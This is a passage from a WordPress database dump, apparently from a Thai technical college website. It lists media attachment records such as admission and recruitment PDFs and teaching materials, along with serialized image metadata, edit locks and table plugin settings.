(30261, 12481, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:706;s:4:\"file\";s:58:\"2021/12/ไม่มีชื่อ-102_20220201143459.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"ไม่มีชื่อ-102_20220201143459-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"ไม่มีชื่อ-102_20220201143459-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"ไม่มีชื่อ-102_20220201143459-768x452.png\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"ไม่มีชื่อ-102_20220201143459-1024x602.png\";s:5:\"width\";i:1024;s:6:\"height\";i:602;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"ไม่มีชื่อ-102_20220201143459-400x235.png\";s:5:\"width\";i:400;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30264, 12487, '_wp_attached_file', '2021/12/40781ec2-f6cd-4a4e-85cc-01aa33462018.mp4'),
(30265, 12487, '_wp_attachment_metadata', 'a:10:{s:7:\"bitrate\";i:1327410;s:8:\"filesize\";i:838381;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:5;s:16:\"length_formatted\";s:4:\"0:05\";s:5:\"width\";i:804;s:6:\"height\";i:540;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:17:\"created_timestamp\";i:1643788407;}'),
(30266, 12488, '_wp_attached_file', '2021/12/317738.jpg'),
(30267, 12488, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:806;s:4:\"file\";s:18:\"2021/12/317738.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"317738-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"317738-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"317738-768x516.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"317738-1024x688.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:688;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"317738-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30268, 12491, '_edit_lock', '1643789253:14'),
(30269, 12491, '_edit_last', '14'),
(30270, 12492, '_wp_attached_file', '2022/02/020265ประกาศรับสมัครครูพิเศษสอนการตลาด.pdf'),
(30273, 12491, '_hide_featured', NULL),
(30278, 12496, '_edit_lock', '1644041114:14'),
(30279, 12496, '_edit_last', '14'),
(30280, 12497, '_wp_attached_file', '2022/02/ประกาศรายชื่อขึ้นทะเบียนเป็นนักเรียน-นักศึกษาโควตา-ภายใน-2565.pdf'),
(30283, 12496, '_hide_featured', NULL),
(30290, 12500, '_edit_lock', '1644041230:14'),
(30291, 12500, '_edit_last', '14'),
(30292, 12501, '_wp_attached_file', '2022/02/ประกาศรายชื่อขึ้นทะเบียนเป็นนักเรียน-นักศึกษาโควตา-ภายนอก2565-1.pdf'),
(30295, 12500, '_hide_featured', NULL),
(30302, 12503, '_edit_lock', '1644041342:14'),
(30303, 12503, '_edit_last', '14'),
(30304, 12504, '_wp_attached_file', '2022/02/การศึกษาการดำเนินงานการประกันคุณภาพการศึกษา-ของ-วท.ระยอง.pdf'),
(30305, 12505, '_wp_attached_file', '2022/02/ประกาศรับสมัครรอบปกติ2565.pdf'),
(30308, 12503, '_hide_featured', NULL),
(30311, 12507, '_wp_attached_file', '2021/12/png_20220205_124849_0000.png'),
(30312, 12507, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:3456;s:4:\"file\";s:36:\"2021/12/png_20220205_124849_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"png_20220205_124849_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"png_20220205_124849_0000-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"png_20220205_124849_0000-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"png_20220205_124849_0000-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:36:\"png_20220205_124849_0000-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30313, 12510, '_wp_attached_file', '2021/12/20220205_130022_0000.png'),
(30314, 12510, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:3456;s:4:\"file\";s:32:\"2021/12/20220205_130022_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220205_130022_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220205_130022_0000-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220205_130022_0000-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220205_130022_0000-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220205_130022_0000-400x200.png\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30315, 12512, '_edit_lock', '1644041896:14'),
(30316, 12512, '_edit_last', '14'),
(30317, 12512, '_hide_featured', NULL),
(30320, 12517, '_edit_lock', '1644294017:14'),
(30321, 12517, '_edit_last', '14'),
(30322, 12518, '_wp_attached_file', '2022/02/คำร้องขอจบการศึกษา64.pdf'),
(30325, 12517, '_hide_featured', NULL),
(30328, 12520, '_wp_attached_file', '2021/12/20220208_111836_0000.png'),
(30329, 12520, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:9216;s:6:\"height\";i:2304;s:4:\"file\";s:32:\"2021/12/20220208_111836_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220208_111836_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"20220208_111836_0000-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220208_111836_0000-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220208_111836_0000-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220208_111836_0000-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30330, 12524, '_wp_attached_file', '2021/12/Untitled-1-1.jpg'),
(30331, 12524, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2021/12/Untitled-1-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30332, 12526, '_wp_attached_file', '2021/12/Untitled-1-2.jpg'),
(30333, 12526, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2021/12/Untitled-1-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-2-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30334, 12529, '_edit_lock', '1644486019:14'),
(30335, 12529, '_edit_last', '14'),
(30336, 12530, '_wp_attached_file', '2022/02/ประกาศรายชื่อเจ้าหน้าที่งานทะเบียน.pdf'),
(30339, 12529, '_hide_featured', NULL),
(30345, 12532, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(30346, 12532, '_tablepress_table_visibility', '{\"rows\":[1,1,1,1,1],\"columns\":[1,1,1,1,1]}'),
(30347, 12533, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(30348, 12533, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1]}'),
(30349, 12534, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(30350, 12534, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(30351, 12535, '_edit_lock', '1644569684:14'),
(30352, 12535, '_edit_last', '14'),
(30353, 12536, '_wp_attached_file', '2022/02/327265.jpg'),
(30354, 12536, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:18:\"2022/02/327265.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327265-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327265-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327265-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30355, 12537, '_edit_lock', '1644568369:14'),
(30356, 12537, '_edit_last', '14'),
(30357, 12538, '_wp_attached_file', '2022/02/01ชุดการสอนวิชาวัดละเอียด.pdf'),
(30358, 12539, '_wp_attached_file', '2022/02/01ปก.pdf'),
(30359, 12540, '_wp_attached_file', '2022/02/01สื่อการสอนวิชาวัดละเอียด.pdf'),
(30360, 12541, '_wp_attached_file', '2022/02/01หน้าปก.pdf'),
(30361, 12542, '_wp_attached_file', '2022/02/02เอกสารการสอนมาตรวิทยา.pdf'),
(30362, 12543, '_wp_attached_file', '2022/02/1.01หน้าปก.pdf'),
(30363, 12544, '_wp_attached_file', '2022/02/2.01ชุดการสอนวิชาวัดละเอียด.pdf'),
(30364, 12545, '_wp_attached_file', '2022/02/3.01สื่อการสอนวิชาวัดละเอียด.pdf'),
(30365, 12546, '_wp_attached_file', '2022/02/4.01ปก.pdf'),
(30366, 12547, '_wp_attached_file', '2022/02/5.02เอกสารการสอนมาตรวิทยา.pdf'),
(30367, 12537, '_hide_featured', NULL),
(30368, 12535, '_hide_featured', NULL),
(30369, 12559, '_wp_attached_file', '2022/02/327366.jpg'),
(30370, 12559, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:18:\"2022/02/327366.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327366-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327366-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327366-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30371, 12562, '_wp_attached_file', '2022/02/327385.jpg'),
(30372, 12562, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:18:\"2022/02/327385.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327385-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327385-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327385-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30373, 12565, '_edit_lock', '1644569608:14'),
(30374, 12566, '_wp_attached_file', '2022/02/327365.jpg'),
(30375, 12566, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:18:\"2022/02/327365.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"327365-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"327365-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"327365-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30376, 12565, '_edit_last', '14'),
(30377, 12567, '_edit_lock', '1644569542:14'),
(30378, 12567, '_edit_last', '14'),
(30379, 12567, '_hide_featured', NULL),
(30380, 12565, '_hide_featured', NULL),
(30383, 12575, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(30384, 12575, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(30385, 12577, '_wp_attached_file', '2022/02/327365-1.jpg'),
(30386, 12577, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:900;s:4:\"file\";s:20:\"2022/02/327365-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"327365-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"327365-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"327365-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30387, 12579, '_wp_attached_file', '2021/12/20220211_215117_0000.png'),
(30388, 12579, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:2304;s:4:\"file\";s:32:\"2021/12/20220211_215117_0000.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"20220211_215117_0000-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"20220211_215117_0000-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"20220211_215117_0000-768x256.png\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"20220211_215117_0000-1024x341.png\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"20220211_215117_0000-400x133.png\";s:5:\"width\";i:400;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30389, 12580, '_wp_attached_file', '2021/12/20220211_215117_0000-1.png'),
(30390, 12580, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:6912;s:6:\"height\";i:2304;s:4:\"file\";s:34:\"2021/12/20220211_215117_0000-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"20220211_215117_0000-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"20220211_215117_0000-1-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"20220211_215117_0000-1-768x256.png\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"20220211_215117_0000-1-1024x341.png\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"20220211_215117_0000-1-400x133.png\";s:5:\"width\";i:400;s:6:\"height\";i:133;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30391, 12581, '_wp_attached_file', '2021/12/png_20220211_215717_0000.png'),
